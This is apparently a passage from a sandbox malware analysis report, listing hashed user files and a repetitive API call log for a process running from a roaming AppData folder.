SHA256: 188425c773868fdd14e52b6f2b2477525e4cd3bb434fc38e238552c68663ef44 		False
c:\users\ciihmnxmn6ps\contacts\aclviho asldjfl.contact 1.67 KB (1712 bytes) MD5: 2b1714598076b3960ed27c2d3b9f6d2e
SHA1: 856ba41045c8395875d330d9571a48b325ce4166
SHA256: c4d0cd2a3f823e017690af78baeb16cc121bc588dba8f1b2ea939e2fcf3d4053 		False
c:\users\ciihmnxmn6ps\contacts\asdlfk poopvy.contact 1.67 KB (1712 bytes) MD5: 4f8ab5551de4b63418f33c793b55d29e
SHA1: 203aaf9efa41dad37802d11fe8daa25dfe2880f1
SHA256: 1dfde3fe4e5134211e9c5311311045118d22959bc71cb0ba664efe9bbe34fc48 		False
c:\users\ciihmnxmn6ps\contacts\chucu jadnvk.contact 1.67 KB (1712 bytes) MD5: ef62f6e9e42054153de73c873b2e377e
SHA1: 6409c597cb6ad5f431902d89d556d5a6e3611400
SHA256: b269b2d672db2bd36d0bf40c6440e7e23de1072c94597445f82c8b2a10ab5ebb 		False
c:\users\ciihmnxmn6ps\contacts\lulcit amkdfe.contact 1.67 KB (1712 bytes) MD5: ae6f0f8df15f844656f13f8e1eba2209
SHA1: 0617e004cd7d582ceed897f2e66acc2413bd435d
SHA256: 2c6328770748881c9ea17cbd97c22ed5a149d0918032da82789a9869181050fb 		False
c:\users\ciihmnxmn6ps\contacts\sikvnb huvuib.contact 1.80 KB (1840 bytes) MD5: 72f57c6c885b18c9ad1e97f7530db5d5
SHA1: 7d5ae2df99f784c930b4fbc84c65064b56074f41
SHA256: 9914b535d048c4596854f57efe89cef04f32fc68741147d226f81734ac32fbe7 		False
c:\users\ciihmnxmn6ps\desktop\0eert0ljww1qhv\-__krkwudncw7vix_s.wav 51.19 KB (52416 bytes) MD5: b95857b0b180b1b3b086a7861ddeaa7d
SHA1: 7541d650523036993cabf3fdf89e41eefdd6c74b
SHA256: cf570f6643c64a1721afd8b0de34c84316939d4083e074f20abd90a3a821bdcb 		False
c:\users\ciihmnxmn6ps\desktop\0eert0ljww1qhv\8g6mia 6.pptx 35.95 KB (36816 bytes) MD5: 38ee62682ffe9ac583b2dff019f52d5e
SHA1: 1a01784e9062b03e20f94295fb5c715d81997775
SHA256: 3ccd1425c07d594aafa0e6409ddcf353a49796500ce6ba5d976567e7d0235e04 		False
c:\users\ciihmnxmn6ps\desktop\0eert0ljww1qhv\lfbogup.mp3 74.17 KB (75952 bytes) MD5: c6136a90fcead756bd15ce909ebf17a3
SHA1: 68fa51b8a08f5f3a10f708819f826e043e98a8ff
SHA256: 2f24d74efbe540ac507c5e3ff4ff1edc3043f78bc525acd1b5e5a2bf7b5592b8 		False
c:\users\ciihmnxmn6ps\ntuser.ini 0.55 KB (560 bytes) MD5: 5311bfb29d17a6f43408b9ba889c684d
SHA1: 4886bd5d287310cc988664b2b1c71ea4450bada2
SHA256: c5caf30250e61f4947d76f63620c2356341ff52983d9982e885ba4fc8a13e7bf 		False
Threads
Thread 0x2e8
(Host: 716, Network: 33)
+
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-01-26 06:53:38 (UTC) True 1
Fn
System Get Time type = Ticks, time = 46328 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74780000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x7479a330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74797580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74799910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7479f400 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74780000 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, size = 260 True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
